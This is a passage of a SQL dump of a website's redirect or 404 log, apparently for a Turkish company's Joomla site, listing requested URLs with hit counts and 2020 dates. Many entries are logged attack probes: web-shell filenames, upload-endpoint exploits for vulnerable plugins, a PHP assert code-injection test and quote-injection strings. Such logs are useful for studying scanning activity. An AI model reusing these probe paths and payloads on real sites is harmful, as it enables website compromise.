00:00:00',301),(26063,'http://3s-technologies.com.tr/tr/wp-json',NULL,'','',4,0,'2020-10-14 13:54:53','0000-00-00 00:00:00',301),(26064,'http://www.3s-technologies.com.tr/tr/dwzfjbjcwnx.html',NULL,'','',1,0,'2020-10-14 14:47:12','0000-00-00 00:00:00',301),(26065,'http://3s-technologies.com.tr/tr/var/resource_config.json',NULL,'','',2,0,'2020-10-16 00:21:58','0000-00-00 00:00:00',301),(26066,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/panasonic',NULL,'','',1,0,'2020-10-17 14:46:39','0000-00-00 00:00:00',301),(26067,'http://3s-technologies.com.tr/tr/callback?id=&act=fastback&site_id=s1&name=edwardner&phone=88493175327&message=<a+href=https://petcrub.com>petcrub.com</a>&recaptcha_challenge_field=&recaptcha_response_field=',NULL,'http://3s-technologies.com.tr/tr/callback?id=&act=fastBack&SITE_ID=s1&name=EdwardnEr&phone=88493175327&message=%3Ca+href%3Dhttps%3A%2F%2Fpetcrub.com%3Epetcrub.com%3C%2Fa%3E&recaptcha_challenge_field=&recaptcha_response_field=','',2,0,'2020-10-17 22:19:51','0000-00-00 00:00:00',301),(26068,'http://3s-technologies.com.tr/tr/xampblpwfbtr.html',NULL,'','',1,0,'2020-10-19 23:53:57','0000-00-00 00:00:00',301),(26069,'http://www.3s-technologies.com.tr/tr/clcubatdxi.html',NULL,'','',1,0,'2020-10-20 12:54:35','0000-00-00 00:00:00',301),(26070,'http://3s-technologies.com.tr/tr/tinyfilemanager.php',NULL,'','',140,0,'2020-10-20 20:39:33','0000-00-00 00:00:00',301),(26071,'http://3s-technologies.com.tr/tr/wp-content/tinyfilemanager.php',NULL,'','',4,0,'2020-10-20 20:39:35','0000-00-00 00:00:00',301),(26072,'http://www.3s-technologies.com.tr/tr/images/gang.txt',NULL,'','',1,0,'2020-10-21 23:57:36','0000-00-00 00:00:00',301),(26073,'http://3s-technologies.com.tr/tr/images/gang.txt',NULL,'','',3,0,'2020-10-22 04:11:41','0000-00-00 00:00:00',301),(26074,'http://3s-technologies.com.tr/tr/components/com_hdflvplayer/js/mootools-core.js',NULL,'','',1,0,'2020-10-25 01:44:41','0000-00-00 00:00:00',301),(26075,'http://3s-technologies.com.tr/tr/wzrgeljc.html',NULL,'','',1,0,'2020-10-25 12:37:17','0000-00-00 00:00:00',301),(26076,'http://3s-technologies.com.tr/en/:{mod_djimageslider}',NULL,'','',1,0,'2020-10-26 03:32:31','0000-00-00 00:00:00',301),(26077,'http://www.3s-technologies.com.tr/tr/okdvzolmprewjrq.html',NULL,'','',1,0,'2020-10-26 12:50:54','0000-00-00 00:00:00',301),(26078,'http://3s-technologies.com.tr/tr/en\'ayc\"hjpxo/products-en',NULL,'','',2,0,'2020-10-26 13:34:44','0000-00-00 00:00:00',301),(26079,'http://3s-technologies.com.tr/en/products-en\'ayc\"hjpxo',NULL,'','',2,0,'2020-10-26 13:34:45','0000-00-00 00:00:00',301),(26080,'http://3s-technologies.com.tr/en/wp-rdf.php',NULL,'','',2,0,'2020-10-27 23:46:24','0000-00-00 00:00:00',301),(26081,'http://3s-technologies.com.tr/en/wp-caches.php',NULL,'','',1,0,'2020-10-28 00:01:12','0000-00-00 00:00:00',301),(26082,'http://3s-technologies.com.tr/en/versions.php',NULL,'','',3,0,'2020-10-28 00:49:45','0000-00-00 00:00:00',301),(26083,'http://3s-technologies.com.tr/en/wp-kidmx.php?script=1',NULL,'','',1,0,'2020-10-28 01:58:22','0000-00-00 00:00:00',301),(26084,'http://3s-technologies.com.tr/en/htaccess.php',NULL,'','',14,0,'2020-10-28 02:16:43','0000-00-00 00:00:00',301),(26085,'http://3s-technologies.com.tr/en/wp-print.php?script=1',NULL,'','',1,0,'2020-10-28 02:31:52','0000-00-00 00:00:00',301),(26086,'http://3s-technologies.com.tr/en/view.php?check=1',NULL,'','',1,0,'2020-10-28 02:47:47','0000-00-00 00:00:00',301),(26087,'http://3s-technologies.com.tr/en/bak.php?login=canshu?',NULL,'','',1,0,'2020-10-28 03:28:40','0000-00-00 00:00:00',301),(26088,'http://3s-technologies.com.tr/en/wp-includse.php?script=1',NULL,'','',1,0,'2020-10-28 04:02:01','0000-00-00 00:00:00',301),(26089,'http://3s-technologies.com.tr/en/backups.php?key=c6y1f2ea7217pbtl1flch98sopfo/r1z76/okfae&mode=config',NULL,'','',1,0,'2020-10-28 05:13:36','0000-00-00 00:00:00',301),(26090,'http://3s-technologies.com.tr/en/kup.php?u=1',NULL,'','',2,0,'2020-10-28 05:33:59','0000-00-00 00:00:00',301),(26091,'http://3s-technologies.com.tr/en/backup.bak.php',NULL,'','',1,0,'2020-10-28 05:53:36','0000-00-00 00:00:00',301),(26092,'http://3s-technologies.com.tr/en/wp-profi1e.php?x=1',NULL,'','',1,0,'2020-10-28 06:10:51','0000-00-00 00:00:00',301),(26093,'http://3s-technologies.com.tr/en/path4.php?testwrite1=1',NULL,'','',1,0,'2020-10-28 06:48:44','0000-00-00 00:00:00',301),(26094,'http://3s-technologies.com.tr/en/wp-feed.php',NULL,'','',2,0,'2020-10-28 06:49:41','0000-00-00 00:00:00',301),(26095,'http://3s-technologies.com.tr/en/configss.php?check=1',NULL,'','',1,0,'2020-10-28 07:46:16','0000-00-00 00:00:00',301),(26096,'http://3s-technologies.com.tr/en/wp-logs.php?action=test',NULL,'','',2,0,'2020-10-28 08:05:34','0000-00-00 00:00:00',301),(26097,'http://3s-technologies.com.tr/en/unz.php',NULL,'','',1,0,'2020-10-28 08:24:36','0000-00-00 00:00:00',301),(26098,'http://3s-technologies.com.tr/en/hook-filters.php',NULL,'','',2,0,'2020-10-28 08:42:38','0000-00-00 00:00:00',301),(26099,'http://3s-technologies.com.tr/en/show.php?check=1',NULL,'','',2,0,'2020-10-28 08:43:42','0000-00-00 00:00:00',301),(26100,'http://3s-technologies.com.tr/en/wp-config_bak.php?x=1',NULL,'','',1,0,'2020-10-28 09:03:05','0000-00-00 00:00:00',301),(26101,'http://3s-technologies.com.tr/en/missok.php?x=1',NULL,'','',1,0,'2020-10-28 09:03:07','0000-00-00 00:00:00',301),(26102,'http://3s-technologies.com.tr/en/assets/images/wp-console.php',NULL,'','',1,0,'2020-10-28 09:22:17','0000-00-00 00:00:00',301),(26103,'http://3s-technologies.com.tr/en/wp-aa.php?up2018info=1',NULL,'','',1,0,'2020-10-28 09:22:17','0000-00-00 00:00:00',301),(26104,'http://3s-technologies.com.tr/en/wp-bb.php?up2018info=1',NULL,'','',1,0,'2020-10-28 09:22:17','0000-00-00 00:00:00',301),(26105,'http://3s-technologies.com.tr/en/assets/images/new_license.php',NULL,'','',1,0,'2020-10-28 09:22:18','0000-00-00 00:00:00',301),(26106,'http://3s-technologies.com.tr/en/wp.php?up2018info=1',NULL,'','',1,0,'2020-10-28 09:22:18','0000-00-00 00:00:00',301),(26107,'http://3s-technologies.com.tr/en/wp-load.php?up2018info=1',NULL,'','',1,0,'2020-10-28 09:22:19','0000-00-00 00:00:00',301),(26108,'http://3s-technologies.com.tr/asfewfefs.php',NULL,'','',1,0,'2020-10-28 10:14:32','0000-00-00 00:00:00',301),(26109,'http://3s-technologies.com.tr/php.info.php',NULL,'','',1,0,'2020-10-28 10:14:33','0000-00-00 00:00:00',301),(26110,'http://3s-technologies.com.tr/plugins/system/jsnframework/assets/3rd-party/jquery-file-upload/upload.php',NULL,'','',1,0,'2020-10-28 10:14:43','0000-00-00 00:00:00',301),(26111,'http://3s-technologies.com.tr/en/modules/mod_feed/tmpl/mod_feed.php?ms-load=yjk5hg',NULL,'','',1,0,'2020-10-28 16:06:36','0000-00-00 00:00:00',301),(26112,'http://3s-technologies.com.tr/en/modules/mod_feed/tmpl/mod_feed.php?ms-load=tgyijk',NULL,'','',1,0,'2020-10-28 18:04:07','0000-00-00 00:00:00',301),(26113,'https://3s-technologies.com.tr/tr/vendor',NULL,'','',1,0,'2020-10-29 22:16:45','0000-00-00 00:00:00',301),(26114,'http://3s-technologies.com.tr/tr/vendor',NULL,'','',34,0,'2020-10-29 22:16:46','0000-00-00 00:00:00',301),(26115,'https://3s-technologies.com.tr/tr/forums',NULL,'','',2,0,'2020-10-29 22:17:01','0000-00-00 00:00:00',301),(26116,'http://3s-technologies.com.tr/tr/forums',NULL,'','',2,0,'2020-10-29 22:17:02','0000-00-00 00:00:00',301),(26117,'https://3s-technologies.com.tr/tr/forum',NULL,'','',1,0,'2020-10-29 22:17:03','0000-00-00 00:00:00',301),(26118,'https://3s-technologies.com.tr/tr/boards',NULL,'','',1,0,'2020-10-29 22:17:05','0000-00-00 00:00:00',301),(26119,'https://3s-technologies.com.tr/tr/foro',NULL,'','',1,0,'2020-10-29 22:17:06','0000-00-00 00:00:00',301),(26120,'http://3s-technologies.com.tr/tr/foro',NULL,'','',1,0,'2020-10-29 22:17:06','0000-00-00 00:00:00',301),(26121,'http://3s-technologies.com.tr/tr/wp-content/plugins/superlogoshowcase-wp/js/docs.js',NULL,'','',1,0,'2020-10-30 08:55:22','0000-00-00 00:00:00',301),(26122,'http://3s-technologies.com.tr/tr/wp-content/plugins/super-interactive-maps/js/docs.js',NULL,'','',1,0,'2020-10-30 08:55:58','0000-00-00 00:00:00',301),(26123,'http://3s-technologies.com.tr/tr/media/com_acym/css/widget.min.css',NULL,'','',1,0,'2020-10-31 09:51:19','0000-00-00 00:00:00',301),(26124,'http://3s-technologies.com.tr/tr/xwttlyaukyefz.html',NULL,'','',1,0,'2020-10-31 15:46:03','0000-00-00 00:00:00',301),(26125,'http://www.3s-technologies.com.tr/tr/jpyjhcrm.html',NULL,'','',1,0,'2020-11-01 04:55:22','0000-00-00 00:00:00',301),(26126,'http://3s-technologies.com.tr/en/administrator/content-comments.min.php?good=1',NULL,'','',1,0,'2020-11-01 12:19:47','0000-00-00 00:00:00',301),(26127,'http://3s-technologies.com.tr/en/media/media.php?1=assert&2=die(pi()*42);',NULL,'','',1,0,'2020-11-01 12:52:30','0000-00-00 00:00:00',301),(26128,'http://3s-technologies.com.tr/tr/media/com_acym/js/global.min.js',NULL,'','',28,0,'2020-11-02 01:28:59','0000-00-00 00:00:00',301),(26129,'http://3s-technologies.com.tr/tr/components/com_acym/acym.php',NULL,'','',8,0,'2020-11-02 04:58:51','0000-00-00 00:00:00',301),(26130,'http://3s-technologies.com.tr/tr/images/gmapfp/xsamxadoo.php.jpg',NULL,'','',12,0,'2020-11-03 07:23:06','0000-00-00 00:00:00',301),(26131,'http://3s-technologies.com.tr/tr/images/gmapfp/xsamxadoo.php.jpeg',NULL,'','',5,0,'2020-11-03 07:23:07','0000-00-00 00:00:00',301),(26132,'http://3s-technologies.com.tr/tr/images/gmapfp/xsamxadoo.php.png',NULL,'','',6,0,'2020-11-03 07:23:07','0000-00-00 00:00:00',301),(26133,'http://3s-technologies.com.tr/tr/images/gmapfp/xsamxadoo.php.gif',NULL,'','',5,0,'2020-11-03 07:23:08','0000-00-00 00:00:00',301),(26134,'http://3s-technologies.com.tr/tr/images/gmapfp/xsamxadoo.phtml.jpg',NULL,'','',5,0,'2020-11-03 07:23:09','0000-00-00 00:00:00',301),(26135,'http://3s-technologies.com.tr/tr/images/gmapfp/xsamxadoo.php5.jpg',NULL,'','',5,0,'2020-11-03 07:23:10','0000-00-00 00:00:00',301),(26136,'http://3s-technologies.com.tr/tr/images/gmapfp/xsamxadoo.php6.jpg',NULL,'','',5,0,'2020-11-03 07:23:11','0000-00-00 00:00:00',301),(26137,'http://3s-technologies.com.tr/tr/images/gmapfp/xsamxadoo.php',NULL,'','',5,0,'2020-11-03 07:23:11','0000-00-00 00:00:00',301),(26138,'http://3s-technologies.com.tr/tr/images/gmapfp/xsamxadoo.phtml',NULL,'','',5,0,'2020-11-03 07:23:12','0000-00-00 00:00:00',301),(26139,'http://3s-technologies.com.tr/tr/images/gmapfp/xsamxadoo.php5',NULL,'','',5,0,'2020-11-03 07:23:12','0000-00-00 00:00:00',301),(26140,'http://3s-technologies.com.tr/tr/images/gmapfp/xsamxadoo.php6',NULL,'','',5,0,'2020-11-03 07:23:13','0000-00-00 00:00:00',301),(26141,'http://3s-technologies.com.tr/tr/images/gmapfp/406.php.png',NULL,'','',1,0,'2020-11-03 07:57:04','0000-00-00 00:00:00',301),(26142,'http://3s-technologies.com.tr/tr/images/gmapfp/mjzrh.php.jpg',NULL,'','',1,0,'2020-11-03 22:39:56','0000-00-00 00:00:00',301),(26143,'http://3s-technologies.com.tr/tr/?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload',NULL,'','',3,0,'2020-11-03 23:38:19','0000-00-00 00:00:00',301),(26144,'http://3s-technologies.com.tr/tr/media/k2/assets/vendors/studio-42/elfinder/php/connector.minimal.php',NULL,'http://www.google.com/','',2,0,'2020-11-05 08:17:18','0000-00-00 00:00:00',301),(26145,'http://3s-technologies.com.tr//index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image',NULL,'','',16,0,'2020-11-07 01:14:35','0000-00-00 00:00:00',301),(26146,'http://3s-technologies.com.tr/tr/dtlvfsilkzav.html',NULL,'','',1,0,'2020-11-07 17:14:20','0000-00-00 00:00:00',301),(26147,'http://www.3s-technologies.com.tr/tr/oiutlitpblpry.html',NULL,'','',1,0,'2020-11-08 03:23:48','0000-00-00 00:00:00',301),(26148,'http://www.3s-technologies.com.tr/tr/vendor/phpunit/phpunit/build.xml',NULL,'','',4,0,'2020-11-09 14:18:49','0000-00-00 00:00:00',301),(26149,'http://3s-technologies.com.tr/tr/yqahosuaxqecaneo.html',NULL,'','',1,0,'2020-11-12 22:45:05','0000-00-00 00:00:00',301),(26150,'http://3s-technologies.com.tr/tr/images/gmapfp/mohamedxo.php.jpg',NULL,'','',1,0,'2020-11-13 08:51:21','0000-00-00 00:00:00',301),(26151,'http://www.3s-technologies.com.tr/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image',NULL,'','',1,0,'2020-11-13 08:51:57','0000-00-00 00:00:00',301),(26152,'http://www.3s-technologies.com.tr/tr/images/gmapfp/mohamedxo.php.jpg',NULL,'','',1,0,'2020-11-13 08:51:58','0000-00-00 00:00:00',301),(26153,'http://www.3s-technologies.com.tr/tr/sybjobnjkop.html',NULL,'','',1,0,'2020-11-14 04:30:31','0000-00-00 00:00:00',301),(26154,'http://3s-technologies.com.tr/en/administrator/templates/isis/ext.php',NULL,'','',1,0,'2020-11-14 07:14:47','0000-00-00 00:00:00',301),(26155,'http://3s-technologies.com.tr/en/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'','',5,0,'2020-11-14 13:04:26','0000-00-00 00:00:00',301),(26156,'http://3s-technologies.com.tr/en/wp-content/plugins/apikey/apikey.php.suspected?test=hello',NULL,'','',2,0,'2020-11-14 13:04:36','0000-00-00 00:00:00',301),(26157,'http://3s-technologies.com.tr/en/plugins/content/apismtp/apismtp.php.suspected?test=hello',NULL,'','',2,0,'2020-11-14 13:04:41','0000-00-00 00:00:00',301),(26158,'http://3s-technologies.com.tr/en/component/k2/itemlist?format=feed&type=rss',NULL,'http://3s-technologies.com.tr/index.php/component/k2/itemlist?format=feed&type=rss','',1,0,'2020-11-14 14:21:50','0000-00-00 00:00:00',301),(26159,'http://3s-technologies.com.tr/en/component/k2/itemlist',NULL,'http://3s-technologies.com.tr/index.php/component/k2/itemlist/','',9,0,'2020-11-14 14:21:51','0000-00-00 00:00:00',301),(26160,'http://www.3s-technologies.com.tr/en/component/k2/itemlist?format=feed&type=rss',NULL,'http://www.3s-technologies.com.tr/index.php/component/k2/itemlist?format=feed&type=rss','',1,0,'2020-11-14 15:15:13','0000-00-00 00:00:00',301),(26161,'http://3s-technologies.com.tr/en/feed',NULL,'','',8,0,'2020-11-14 22:49:54','0000-00-00 00:00:00',301),(26162,'http://3s-technologies.com.tr/tr/components/com_acym/index.html',NULL,'http://www.google.com/','',6,0,'2020-11-15 17:05:09','0000-00-00 00:00:00',301),(26163,'http://www.3s-technologies.com.tr/tr/wp-includes/images/xit.gif',NULL,'','',1,0,'2020-11-17 00:09:29','0000-00-00 00:00:00',301),(26164,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-file-manager/css/jquery-ui.css',NULL,'','',1,0,'2020-11-17 15:18:04','0000-00-00 00:00:00',301),(26165,'http://3s-technologies.com.tr/tr/media/com_acym/upload/socials/xsam_xadoo_bot.php',NULL,'','',2,0,'2020-11-17 16:16:09','0000-00-00 00:00:00',301),(26166,'http://3s-technologies.com.tr/en/administrator/components/com_jvframework/assets/css/jcarousel.css',NULL,'','',2,0,'2020-11-18 08:01:49','0000-00-00 00:00:00',301),(26167,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/k_sb_2_150x150.png',NULL,'','',2,0,'2020-11-18 18:55:37','0000-00-00 00:00:00',301),(26168,'http://3s-technologies.com.tr/en//wp-login.php',NULL,'','',1,0,'2020-11-19 04:29:07','0000-00-00 00:00:00',301),(26169,'http://3s-technologies.com.tr/tr/wp-content/plugins/apikey/josmtpapi.php?test=hello',NULL,'','',1,0,'2020-11-19 16:06:53','0000-00-00 00:00:00',301),(26170,'http://3s-technologies.com.tr/tr/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'','',2,0,'2020-11-19 16:06:53','0000-00-00 00:00:00',301),(26171,'http://3s-technologies.com.tr/tr/wp-content/plugins/apikey/apikey.php.suspected?test=hello',NULL,'','',1,0,'2020-11-19 16:06:53','0000-00-00 00:00:00',301),(26172,'http://3s-technologies.com.tr/tr/wordpress/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'','',1,0,'2020-11-19 16:06:54','0000-00-00 00:00:00',301),(26173,'http://3s-technologies.com.tr/tr/wordpress/wp-content/plugins/apikey/apikey.php.suspected?test=hello/wp/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'','',1,0,'2020-11-19 16:06:54','0000-00-00 00:00:00',301),(26174,'http://3s-technologies.com.tr/tr/aipkey.php?test=hello',NULL,'','',1,0,'2020-11-19 16:06:55','0000-00-00 00:00:00',301),(26175,'http://3s-technologies.com.tr/tr/images/aipkey.php?test=hello',NULL,'','',1,0,'2020-11-19 16:06:55','0000-00-00 00:00:00',301),(26176,'http://3s-technologies.com.tr/tr/bitrix/admin/htmleditor2/aipkey.php?test=hello',NULL,'','',1,0,'2020-11-19 16:06:56','0000-00-00 00:00:00',301),(26177,'http://3s-technologies.com.tr/tr/sites/all/themes/views/views.php?test=hello',NULL,'','',1,0,'2020-11-19 16:06:57','0000-00-00 00:00:00',301),(26178,'http://3s-technologies.com.tr/tr/wp-content/uploads/zgepd_oddsd.php?test=hello',NULL,'','',1,0,'2020-11-19 16:06:57','0000-00-00 00:00:00',301),(26179,'http://3s-technologies.com.tr/tr/aipkey.php.suspected?test=hello',NULL,'','',1,0,'2020-11-19 16:06:57','0000-00-00 00:00:00',301),(26180,'http://3s-technologies.com.tr/tr/images/aipkey.php.suspected?test=hello',NULL,'','',1,0,'2020-11-19 16:06:58','0000-00-00 00:00:00',301),(26181,'http://3s-technologies.com.tr/tr/media/com_acym/upload/socials/xxxdddshell.php',NULL,'','',3,0,'2020-11-20 10:32:53','0000-00-00 00:00:00',301),(26182,'http://3s-technologies.com.tr/tr/bjguwnvtfqq.html',NULL,'','',1,0,'2020-11-21 17:09:55','0000-00-00 00:00:00',301),(26183,'http://3s-technologies.com.tr/en/usage',NULL,'','',1,0,'2020-11-21 22:21:42','0000-00-00 00:00:00',301),(26184,'http://3s-technologies.com.tr/tr/admin/cms_wysiwyg/directive/index',NULL,'','',2,0,'2020-11-22 10:20:17','0000-00-00 00:00:00',301),(26185,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/blank.php?admin=saz',NULL,'','',1,0,'2020-11-22 10:20:22','0000-00-00 00:00:00',301),(26186,'http://3s-technologies.com.tr/en/stat',NULL,'','',1,0,'2020-11-22 14:26:58','0000-00-00 00:00:00',301),(26187,'http://www.3s-technologies.com.tr/tr/awwedhrslqycmeuo.html',NULL,'','',1,0,'2020-11-22 17:17:22','0000-00-00 00:00:00',301),(26188,'https://3s-technologies.com.tr/tr/libs/js/iframe.js',NULL,'','',1,0,'2020-11-24 05:32:02','0000-00-00 00:00:00',301),(26189,'http://3s-technologies.com.tr/en//2020/wp-includes/wlwmanifest.xml',NULL,'','',7,0,'2020-11-25 09:42:31','0000-00-00 00:00:00',301),(26190,'http://3s-technologies.com.tr/en/cache.php',NULL,'','',4,0,'2020-11-25 14:16:19','0000-00-00 00:00:00',301),(26191,'http://www.3s-technologies.com.tr/tr/images/panasonic/npm-vf-1.png',NULL,'http://www.3s-technologies.com.tr/administrator/index.php?option=com_content&view=article&layout=edit&id=100','',2,0,'2020-11-25 17:09:08','0000-00-00 00:00:00',301),(26192,'http://www.3s-technologies.com.tr/tr/images/slideshow/80-sp18_av3.jpg',NULL,'','',8,0,'2020-11-26 05:37:53','0000-00-00 00:00:00',301),(26193,'http://www.3s-technologies.com.tr/tr/??r??nler/am100-detail?tmpl=component&format=pdf',NULL,'http://www.3s-technologies.com.tr/tr/%C3%BCr%C3%BCnler/smd-orta-h%C4%B1zl%C4%B1/am100-detail','',4,0,'2020-11-26 06:38:50','0000-00-00 00:00:00',301),(26194,'http://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/css/vm-bs2-common.css?vmver=6ee028ee',NULL,'http://www.3s-technologies.com.tr/tr/%C3%BCr%C3%BCnler/smd-orta-h%C4%B1zl%C4%B1/am100-detail','',8,0,'2020-11-26 06:40:33','0000-00-00 00:00:00',301),(26195,'http://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/css/vm-bs3-common.css?vmver=6ee028ee',NULL,'http://www.3s-technologies.com.tr/tr/%C3%BCr%C3%BCnler/smd-orta-h%C4%B1zl%C4%B1/am100-detail','',7,0,'2020-11-26 06:41:09','0000-00-00 00:00:00',301),(26196,'http://www.3s-technologies.com.tr/en/ürünler/smd-orta-hızlı/am100-detail',NULL,'http://www.3s-technologies.com.tr/en/home-en','',1,0,'2020-11-26 08:02:54','0000-00-00 00:00:00',301),(26197,'http://3s-technologies.com.tr/tr/wp-content/plugins/advanced_file_manager_5/php/connector.minimal.php',NULL,'http://www.google.com/','',3,0,'2020-11-27 03:35:30','0000-00-00 00:00:00',301),(26198,'http://3s-technologies.com.tr/tr/wp-content/plugins/advanced_file_manager_5/php/connector.minimal.php',NULL,'http://www.google.com/','',1,0,'2020-11-27 03:35:30','0000-00-00 00:00:00',301),(26199,'http://mail.3s-technologies.com.tr/tr/vendor/phpunit/phpunit/build.xml',NULL,'','',1,0,'2020-11-28 01:25:50','0000-00-00 00:00:00',301),(26200,'http://3s-technologies.com.tr/tr/modules/global/res/js/elfinder/php/connector.minimal.php',NULL,'http://www.google.com/','',2,0,'2020-11-28 04:51:37','0000-00-00 00:00:00',301),(26201,'http://3s-technologies.com.tr/tr/modules/tadtools/elfinder/php/connector.minimal.php',NULL,'http://www.google.com/','',2,0,'2020-11-28 10:41:43','0000-00-00 00:00:00',301),(26202,'https://www.3s-technologies.com.tr/tr/images/slideshow/00-center-comp-1-640x377.png',NULL,'','',5,0,'2020-11-29 08:48:50','0000-00-00 00:00:00',301),(26203,'http://3s-technologies.com.tr/tr/kygfbendowyzz.html',NULL,'','',1,0,'2020-11-29 14:06:56','0000-00-00 00:00:00',301),(26204,'http://www.3s-technologies.com.tr/tr/kecqyqowgescjtme.html',NULL,'','',1,0,'2020-11-30 01:07:01','0000-00-00 00:00:00',301),(26205,'https://3s-technologies.com.tr/tr/images/slideshow/00-center-comp-1-640x377.png',NULL,'','',14,0,'2020-12-03 00:57:46','0000-00-00 00:00:00',301),(26206,'https://3s-technologies.com.tr/en/catalog/adminhtml_category',NULL,'','',1,0,'2020-12-04 15:32:55','0000-00-00 00:00:00',301),(26207,'http://3s-technologies.com.tr/tr/bpanmcqzeiywhbcs.html',NULL,'','',1,0,'2020-12-05 21:37:25','0000-00-00 00:00:00',301),(26208,'http://3s-technologies.com.tr/tr/tranesers2244554223/wetransfer/wetransfer/c08fxz9tl7ajplxn9wc3z95b.php',NULL,'http://site.ru','',1,0,'2020-12-05 22:53:30','0000-00-00 00:00:00',301),(26209,'http://www.3s-technologies.com.tr/tr/ytqbhsenwmcr.html',NULL,'','',1,0,'2020-12-06 20:55:57','0000-00-00 00:00:00',301),(26210,'http://3s-technologies.com.tr/tr/old/aspnet_client/.5ebff.php.suspected',NULL,'http://site.ru','',5,0,'2020-12-07 02:49:22','0000-00-00 00:00:00',301),(26211,'http://3s-technologies.com.tr/en/vendor/phpunit/phpunit/composer.json',NULL,'','',1,0,'2020-12-07 04:39:18','0000-00-00 00:00:00',301),(26212,'http://3s-technologies.com.tr/tr/popcorn.php.suspected',NULL,'http://site.ru','',3,0,'2020-12-07 10:02:55','0000-00-00 00:00:00',301),(26213,'http://3s-technologies.com.tr/en/wp-content/plugins/easy-wp-smtp',NULL,'google.com','',1,0,'2020-12-08 10:01:45','0000-00-00 00:00:00',301),(26214,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/dm2.php',NULL,'http://site.ru','',1,0,'2020-12-09 20:51:28','0000-00-00 00:00:00',301),(26215,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/images.php.suspected',NULL,'http://site.ru','',1,0,'2020-12-09 22:03:14','0000-00-00 00:00:00',301),(26216,'http://3s-technologies.com.tr/tr/components/com_search/models/mide.php',NULL,'http://google.com','',2,0,'2020-12-10 00:37:55','0000-00-00 00:00:00',301),(26217,'http://3s-technologies.com.tr/tr/layouts/joomla/system/popup-pomo.php.suspected',NULL,'http://google.com','',1,0,'2020-12-10 04:05:00','0000-00-00 00:00:00',301),(26218,'http://3s-technologies.com.tr/tr/wp-content/themes/velux/doc.php',NULL,'http://google.com','',1,0,'2020-12-10 06:32:25','0000-00-00 00:00:00',301),(26219,'http://3s-technologies.com.tr/tr/wp-connect.php',NULL,'http://google.com','',2,0,'2020-12-10 10:49:24','0000-00-00 00:00:00',301),(26220,'http://3s-technologies.com.tr/en/__media__/js/netsoltrademark.php?d=baidu.com',NULL,'','',1,0,'2020-12-10 22:21:35','0000-00-00 00:00:00',301),(26221,'http://3s-technologies.com.tr/config.bak.php',NULL,'','',5,0,'2020-12-12 03:46:17','0000-00-00 00:00:00',301),(26222,'https://3s-technologies.com.tr/config.bak.php',NULL,'','',3,0,'2020-12-12 03:46:24','0000-00-00 00:00:00',301),(26223,'http://3s-technologies.com.tr/tr/wp-admin/maint/dm2.php',NULL,'http://google.com','',1,0,'2020-12-12 22:44:09','0000-00-00 00:00:00',301),(26224,'http://3s-technologies.com.tr/tr/wp-content/uploads/2016/03/wp-query.php',NULL,'http://google.com','',1,0,'2020-12-13 05:11:02','0000-00-00 00:00:00',301),(26225,'http://www.3s-technologies.com.tr/tr/images/slideshow/00-center-comp-1-640x377.png',NULL,'','',4,0,'2020-12-14 01:22:08','0000-00-00 00:00:00',301),(26226,'http://3s-technologies.com.tr/tr/gdstrvfrqhgnig.html',NULL,'','',1,0,'2020-12-14 16:24:26','0000-00-00 00:00:00',301),(26227,'http://3s-technologies.com.tr/tr/wp-admin/images/data.php',NULL,'http://google.com','',1,0,'2020-12-14 17:54:33','0000-00-00 00:00:00',301),(26228,'http://3s-technologies.com.tr/tr/sitemap.xml.gz',NULL,'','',47,0,'2020-12-15 04:19:34','0000-00-00 00:00:00',301),(26229,'http://3s-technologies.com.tr/tr/atom.xml',NULL,'','',7,0,'2020-12-15 05:03:56','0000-00-00 00:00:00',301),(26230,'http://3s-technologies.com.tr/tr/sitemaps.xml',NULL,'','',41,0,'2020-12-15 05:18:33','0000-00-00 00:00:00',301),(26231,'http://3s-technologies.com.tr/tr/sitemap_index.xml',NULL,'','',44,0,'2020-12-15 06:12:01','0000-00-00 00:00:00',301),(26232,'http://3s-technologies.com.tr/tr/libraries/joomla/template/popup-pomo.php.suspected',NULL,'http://google.com','',2,0,'2020-12-19 00:40:05','0000-00-00 00:00:00',301),(26233,'http://3s-technologies.com.tr/en/forum.php',NULL,'','',1,0,'2020-12-19 08:51:29','0000-00-00 00:00:00',301),(26234,'http://3s-technologies.com.tr/en/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/assets/css/dnd-upload-cf7.css',NULL,'www.google.com','',1,0,'2020-12-22 10:44:27','0000-00-00 00:00:00',301),(26235,'http://www.3s-technologies.com.tr/tr/blog/wp-admin/install.php',NULL,'','',2,0,'2020-12-23 10:18:09','0000-00-00 00:00:00',301),(26236,'http://www.3s-technologies.com.tr/tr/new/wp-admin/install.php',NULL,'','',2,0,'2020-12-23 10:18:11','0000-00-00 00:00:00',301),(26237,'http://www.3s-technologies.com.tr/tr/backup/wp-admin/install.php',NULL,'','',2,0,'2020-12-23 10:18:12','0000-00-00 00:00:00',301),(26238,'http://3s-technologies.com.tr/tr/__media__/js/netsoltrademark.php?d=test.com',NULL,'','',1,0,'2020-12-24 11:19:34','0000-00-00 00:00:00',301),(26239,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer',NULL,'','',2,0,'2020-12-24 17:57:56','0000-00-00 00:00:00',301),(26240,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/?itemid=429',NULL,'','',4,0,'2020-12-24 23:06:27','0000-00-00 00:00:00',301),(26241,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/?itemid=243',NULL,'','',5,0,'2020-12-24 23:06:33','0000-00-00 00:00:00',301),(26242,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/revslider/temp/update_extract/raiz0__wsjul.php',NULL,'','',1,0,'2020-12-25 19:40:58','0000-00-00 